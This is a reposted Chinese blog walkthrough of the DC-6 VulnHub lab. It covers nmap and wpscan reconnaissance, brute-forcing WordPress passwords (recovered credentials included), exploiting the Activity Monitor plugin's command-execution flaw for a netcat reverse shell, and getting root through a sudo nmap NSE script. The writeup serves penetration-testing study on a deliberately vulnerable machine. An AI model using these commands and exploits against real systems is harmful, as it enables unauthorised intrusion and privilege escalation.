【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)
目錄
DC-6靶機滲透測試
1、信息收集
1.1 發現DC-6的IP地址
1.2 掃描開放端口
1.3 訪問web網頁(添加本地DNS解析)
1.4 Wpscan掃描站點(用戶名)
2、WEB滲透
2.1 爆破WordPress站點用戶名和密碼
2.2 爆破后臺路徑
2.3、activity monitor漏洞利用
2.4? 進入mark的家目錄
2.5、反彈jens用戶的shell
3、通過nmap提權
?
DC-6靶機滲透測試
0x00實驗環境
靶機:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190)
測試機:Kali,IP地址:192.168.3.188
1、信息收集
1.1 發現DC-6的IP地址
利用DC-6的MAC地址找到IP
命令:nmap -sP 192.168.3.1/24 -oN nmap.sP
發現DC-6的IP為192.168.3.190
1.2 掃描開放端口
nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A
發現開放了22端口和80端口
以及:http-title: Did not follow redirect to http://wordy/??? 訪問ip后會重定向到http://wordy/
1.3 訪問web網頁(添加本地DNS解析)
本機訪問192.168.3.190,發現網頁打不開,是因為沒有添加本地DNS解析
我們在本機C:\Windows\System32\drivers\etc的hosts文件中添加
本地添加DNS解析之后,刷新后發現能成功訪問(我們原來輸入的是IP地址,它會自動跳轉到wordy)
發現:
Wordy
Just another WordPress site
是一個WordPress(是國外三大開源的PHP CMS 之一)
除了本地需要修改hosts文件,那我們用kali虛擬機去訪問目標80端口的時候,我們也需要去修改一下本機的host文件
vim /etc/hosts
1.4 Wpscan掃描站點(用戶名)
wpscan --url wordy -e u?????????? 列出WordPress用戶和賬號
| u | 枚舉用戶名,默認從1-10 |
| --enumerate | -e [option(s)] ?枚舉 |
| --url | -u ?要掃描的`WordPress`站點. |
在使用wpscan之前我們要做一個工具的更新:?? wpscan --update??? 更新工具
2、WEB滲透
2.1 爆破WordPress站點用戶名和密碼
掃描后發現存在admin、sarah、graham、mark、jens用戶,嘗試爆破出密碼
DC-6的作者在這里也給出了密碼的提示https://www.vulnhub.com/entry/dc-6,315/
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)
先把admin、sarah、graham、mark、jens用戶寫在user.dic
wpscan --url wordy -U user.dic -P passwords.txt(使用wpscan爆破WordPress站點用戶名和密碼)
Username: mark,
Password: helpdesk01
2.2 爆破后臺路徑
Robots.txt 有時會寫著,在一個一般開源cms都是有固定后臺的,比如joomla后臺路徑就是administrator ,wordpress的就是wp_admin ,dedecms就是dede 常用的還有admin login manger 等等
登錄后臺:
發現使用了activity monitor插件
2.3、activity monitor漏洞利用
百度搜索其漏洞:http://blog.nsfocus.net/cve-2018-15877/
或者kali搜索其插件漏洞:
searchsploit active monitor
存在遠程執行漏洞可以反彈shell 到本地
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
打開45274.html,修改如下兩處地方
python -m SimpleHTTPServer
當前目錄下開啟http 服務
本機Submit request
本地再監聽9999,發現沒有反彈成功誒!
burp抓包看看:發現后面加管道符可以執行代碼
可以看到漏洞說的確存在的,那么我們下一步就彈shell
我們現在本地監聽一下:nc -lvvp 2333
抓包改包、放包
連接成功:
進入交互式shell
2.4? 進入mark的家目錄
- Add new user: graham - GSo7isUM1D4 - done
得到用戶graham的密碼,用ssh遠程登錄
檢查sudo權限
可以看到 “backups.sh” 不需要密碼,即可修改
利用這個sh腳本可以直接獲取到jens的shell
2.5、反彈jens用戶的shell
sudo -l看一下
?
3、通過nmap提權
nmap提權可以參考:https://gtfobins.github.io/gtfobins/nmap/#shell
echo "os.execute('/bin/bash')" >> root.nse ? ?#將os.execute('/bin/bash')寫入到root.nse文件中
sudo nmap --script=root.nse ? ? ? ? ? ? ? ? ? ? ? ? #利用nmap插件執行/bin/bash來獲取root權限
1、用wpscan掃描用戶名和爆破密碼
2、activity monitor命令執行漏洞的利用
3、通過nmap插件來反彈shell
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【CyberSecurityLearni
- 下一篇: 我国地方大数据政策的扩散模式与转移特征研